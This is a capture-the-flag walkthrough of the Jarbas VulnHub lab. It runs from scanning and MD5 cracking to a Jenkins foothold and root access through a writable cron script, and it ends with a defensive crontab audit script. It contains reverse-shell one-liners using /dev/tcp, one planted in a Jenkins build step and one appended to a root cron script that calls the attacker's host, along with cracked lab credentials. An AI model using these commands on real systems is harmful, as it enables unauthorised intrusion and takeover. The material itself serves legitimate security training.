Jarbas (VulnHub) penetration testing notes
woodpecker

Lab address: https://www.vulnhub.com/entry/jarbas-1,232/
Information gathering
- Host discovery
```
nmap -sn 192.168.18.142/24
Starting Nmap 7.92 ( https://nmap.org ) at 2023-02-15 13:32 CST
Nmap scan report for 192.168.18.1
Host is up (0.026s latency).
MAC Address: 30:AE:7B:E3:91:3F (Deqing Dusun Electron)
Nmap scan report for 192.168.18.123
Host is up (0.0020s latency).
MAC Address: 8C:AB:8E:7D:2C:F3 (Shanghai Feixun Communication)
Nmap scan report for LAPTOP-1DVA2N7.lan (192.168.18.197)
Host is up (0.00011s latency).
MAC Address: 40:74:E0:20:72:D1 (Intel Corporate)
Nmap scan report for jarbas.lan (192.168.18.218)
Host is up (0.00034s latency).
MAC Address: 00:0C:29:1F:20:4E (VMware)
Nmap scan report for kali.lan (192.168.18.142)
Host is up.
Nmap done: 256 IP addresses (5 hosts up) scanned in 2.28 seconds
```
- Port scan
```
┌──(root㉿kali)-[~]
└─# nmap --min-rate 10000 192.168.18.218
Starting Nmap 7.92 ( https://nmap.org ) at 2023-02-15 13:37 CST
Nmap scan report for jarbas.lan (192.168.18.218)
Host is up (0.000074s latency).
Not shown: 996 closed tcp ports (reset)
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
3306/tcp open  mysql
8080/tcp open  http-proxy
MAC Address: 00:0C:29:1F:20:4E (VMware)

Nmap done: 1 IP address (1 host up) scanned in 0.27 seconds
```
- Port details and operating system
```
======== TCP
└─# nmap -sT -sV -O -p22,80,3306,8080 192.168.18.218
Starting Nmap 7.92 ( https://nmap.org ) at 2023-02-15 13:38 CST
Nmap scan report for jarbas.lan (192.168.18.218)
Host is up (0.00040s latency).
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.4 (protocol 2.0)
80/tcp   open  http    Apache httpd 2.4.6 ((CentOS) PHP/5.4.16)
3306/tcp open  mysql   MariaDB (unauthorized)
8080/tcp open  http    Jetty 9.4.z-SNAPSHOT
MAC Address: 00:0C:29:1F:20:4E (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.18 seconds

======== UDP
└─# nmap -sU -p22,80,3306,8080 192.168.18.218
Starting Nmap 7.92 ( https://nmap.org ) at 2023-02-15 13:43 CST
Nmap scan report for jarbas.lan (192.168.18.218)
Host is up (0.00018s latency).
PORT     STATE  SERVICE
22/udp   closed ssh
80/udp   closed http
3306/udp closed mysql
8080/udp closed http-alt
MAC Address: 00:0C:29:1F:20:4E (VMware)

Nmap done: 1 IP address (1 host up) scanned in 0.26 seconds
```
- Script scan
```
└─# nmap --script=vuln -p22,80,3306,8080 192.168.18.218
Starting Nmap 7.92 ( https://nmap.org ) at 2023-02-15 13:40 CST
Nmap scan report for jarbas.lan (192.168.18.218)
Host is up (0.00025s latency).
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
|_http-trace: TRACE is enabled
| http-enum:
|_  /icons/: Potentially interesting folder w/ directory listing
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
3306/tcp open  mysql
|_mysql-vuln-cve2012-2122: ERROR: Script execution failed (use -d to debug)
8080/tcp open  http-proxy
| http-enum:
|_  /robots.txt: Robots file
MAC Address: 00:0C:29:1F:20:4E (VMware)

Nmap done: 1 IP address (1 host up) scanned in 31.81 seconds
```
Vulnerability testing on ports 80 and 8080
- Browse ports 80 and 8080 in a browser
- Run a directory scan
dirb scan
```
└─# dirb http://192.168.18.218

-----------------
DIRB v2.22
By The Dark Raver
-----------------

START_TIME: Wed Feb 15 13:50:33 2023
URL_BASE: http://192.168.18.218/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612

---- Scanning URL: http://192.168.18.218/ ----
+ http://192.168.18.218/cgi-bin/ (CODE:403|SIZE:210)
+ http://192.168.18.218/index.html (CODE:200|SIZE:32808)

-----------------
END_TIME: Wed Feb 15 13:50:39 2023
DOWNLOADED: 4612 - FOUND: 2
```
Yujian (御剑) scan
```
"1","http://192.168.18.218/index.html","200"
"2","http://192.168.18.218/access.html","200"
"3","http://192.168.18.218/\.html","403"
```
- Browsing the discovered pages, one useful page turns up: http://192.168.18.218/access.html
It lists what look like usernames and password hashes:
tiago:5978a63b4654c73c60fa24f836386d87 trindade:f463f63616cb3f1e81ce46b39f882fd5 eder:9b38e2b1e8b12f426b0d208a7ab6cb98
- Identify the hash type
```
hash-identifier 5978a63b4654c73c60fa24f836386d87
(banner omitted)
--------------------------------------------------
Possible Hashs:
[+] MD5
[+] Domain Cached Credentials - MD4(MD4(($pass)).(strtolower($username)))
```
The hashes are MD5.
- Crack the passwords
```
5978a63b4654c73c60fa24f836386d87:italia99
9b38e2b1e8b12f426b0d208a7ab6cb98:vipsu
f463f63616cb3f1e81ce46b39f882fd5:marianna
```
Mapped back to the usernames from access.html:
```
tiago:italia99
trindade:vipsu
eder:marianna
```
- Try logging in on port 8080
The usernames and passwords do not line up one-to-one, so each username has to be tried against each password; the following combination succeeds:
eder:vipsu
- Insert a reverse shell while building a project
- Create a new job
- Create a new job and click OK
- Under the post-build actions, enter the reverse shell command
- Enter the reverse shell and click Save
```
bash -i >& /dev/tcp/ip/port 0>&1
```
- Keep nc listening on the attacking machine, then click Build
```
nc -lvvp 4444
listening on [any] 4444 ...
```
- Look for useful information
```
bash-4.2$ uname -a
uname -a
Linux jarbas 3.10.0-693.21.1.el7.x86_64 #1 SMP Wed Mar 7 19:03:37 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
bash-4.2$ sudo -l
sudo -l

We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:

    #1) Respect the privacy of others.
    #2) Think before you type.
    #3) With great power comes great responsibility.

sudo: no tty present and no askpass program specified
```
The shell has very low privileges, so the next step is privilege escalation.
Privilege escalation
- Check the accounts on the system
```
bash-4.2$ cat /etc/passwd
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
systemd-network:x:192:192:systemd Network Management:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
polkitd:x:999:997:User for polkitd:/:/sbin/nologin
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
chrony:x:998:996::/var/lib/chrony:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
eder:x:1000:1000:Eder Luiz:/home/eder:/bin/bash
apache:x:48:48:Apache:/usr/share/httpd:/sbin/nologin
mysql:x:27:27:MariaDB Server:/var/lib/mysql:/sbin/nologin
jenkins:x:997:995:Jenkins Automation Server:/var/lib/jenkins:/bin/false
bash-4.2$
```
The eder account exists, so try reusing its credentials over SSH
```
┌──(root㉿kali)-[~]
└─# ssh eder@219.168.18.218
ssh: connect to host 219.168.18.218 port 22: Connection timed out
```
- Try escalating privileges through cron jobs
There is a cron job on the system:
```
bash-4.2$ cat /etc/crontab
cat /etc/crontab
SHELL=/bin/bash
PATH=/sbin:/bin:/usr/sbin:/usr/bin
MAILTO=root

# For details see man 4 crontabs

# Example of job definition:
# .---------------- minute (0 - 59)
# |  .------------- hour (0 - 23)
# |  |  .---------- day of month (1 - 31)
# |  |  |  .------- month (1 - 12) OR jan,feb,mar,apr ...
# |  |  |  |  .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat
# |  |  |  |  |
# *  *  *  *  * user-name  command to be executed
*/5 * * * * root /etc/script/CleaningScript.sh >/dev/null 2>&1
bash-4.2$ cat /etc/script/CleaningScript.sh
cat /etc/script/CleaningScript.sh
#!/bin/bash
rm -rf /var/log/httpd/access_log.txt
```
- Append a reverse shell to the cron job's script
Start the listener before the job runs:
```
└─# nc -lvvp 4442
listening on [any] 4442 ...
```
Then append the reverse shell on the target:
```
echo '/bin/bash -i >& /dev/tcp/192.168.18.142/4442 0>&1' >> /etc/script/CleaningScript.sh
```
Wait about five minutes for the job to fire:
```
┌──(root㉿kali)-[~/Desktop/vulhub]
└─# nc -lvp 4442
listening on [any] 4442 ...
connect to [192.168.18.142] from jarbas.lan [192.168.18.218] 42608
bash: no job control in this shell
[root@jarbas ~]# sudo -l
sudo -l
Matching Defaults entries for root on jarbas:
    !visiblepw, always_set_home, match_group_by_gid, env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE KDEDIR LS_COLORS",
    env_keep+="MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE",
    env_keep+="LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES",
    env_keep+="LC_MONETARY LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE",
    env_keep+="LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY",
    secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin

User root may run the following commands on jarbas:
    (ALL) ALL
[root@jarbas ~]#
```
That concludes the penetration.
Summary
- Notes on crontab
- A low-privileged account normally cannot write cron entries of its own, but a reverse shell can be appended to an existing script that a high-privileged cron job already runs.
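As an added defensive check (example code written for these notes, not part of the original write-up or the Jarbas VM): a shell script that audits an /etc/crontab-style file for root jobs whose script is group- or world-writable, the exact weakness used above. The crontab and scripts it inspects are a constructed fixture built in a temporary directory; it assumes the standard five-time-field plus user plus command format and only checks the script file itself, not its parent directory.

```shell
#!/bin/bash
# Added example, not from the original write-up: find system crontab jobs that
# run as root but execute a script writable by group or others. That is how
# CleaningScript.sh was abused above: writable by the Jenkins account, run as
# root every five minutes.

# Usage: audit_crontab /path/to/crontab
# Prints "user script" for each risky entry; prints nothing when clean.
audit_crontab() {
    crontab_file="$1"
    # Drop comments, blank lines and VAR=value assignments; keep job lines.
    grep -Ev '^[[:space:]]*(#|$|[A-Za-z_]+=)' "$crontab_file" |
    while read -r _min _hour _dom _mon _dow user cmd; do
        script="${cmd%% *}"                 # first word is the program run
        [ "$user" = "root" ] || continue    # only privileged jobs matter here
        [ -f "$script" ] || continue        # nothing to stat
        perm=$(ls -ld "$script")
        # ls -l mode string: char 6 is group write, char 9 is other write.
        case "$perm" in
            ?????w*|????????w*) echo "$user $script" ;;
        esac
    done
}

# Constructed fixture: one world-writable root script (the misconfiguration)
# and one correctly permissioned script. Echoes the directory for cleanup.
build_fixture() {
    d=$(mktemp -d)
    printf '#!/bin/bash\nrm -rf /var/log/httpd/access_log.txt\n' > "$d/CleaningScript.sh"
    printf '#!/bin/bash\necho ok\n' > "$d/safe.sh"
    chmod 777 "$d/CleaningScript.sh"
    chmod 755 "$d/safe.sh"
    cat > "$d/crontab" <<EOF
SHELL=/bin/bash
PATH=/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user command
*/5 * * * * root $d/CleaningScript.sh >/dev/null 2>&1
0 * * * * root $d/safe.sh
EOF
    echo "$d"
}

fixture=$(build_fixture)
audit_crontab "$fixture/crontab"   # reports only CleaningScript.sh
rm -rf "$fixture"
```

Run it against the real /etc/crontab (and /etc/cron.d/*) on a host you administer; any line it prints is a script that should be root-owned with mode 755 or tighter.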
Disclaimer
1. General disclaimer: The technical information in this article is provided for reference only and does not constitute professional advice. Readers should use it with caution according to their own circumstances and must comply with the Cybersecurity Law of the People's Republic of China; the author and the publishing platform accept no responsibility for any direct or indirect liability or loss arising from the use of this information.
2. Applicability: The technical content may not apply to every situation or system; test and evaluate it thoroughly before applying it in practice. The parties concerned accept no responsibility for problems caused by improper use.
3. Currency: Technology changes quickly and the content of this article may lag behind. Readers must judge the timeliness of the information themselves; the author and the publishing platform accept no responsibility for consequences of relying on outdated content.
This article represents the independent views of woodpecker; reproduction without authorization is prohibited.
For authorization, questions about the article, or removal requests, contact FreeBuf customer service Xiaomifeng (WeChat: freebee1024).
2023-02-15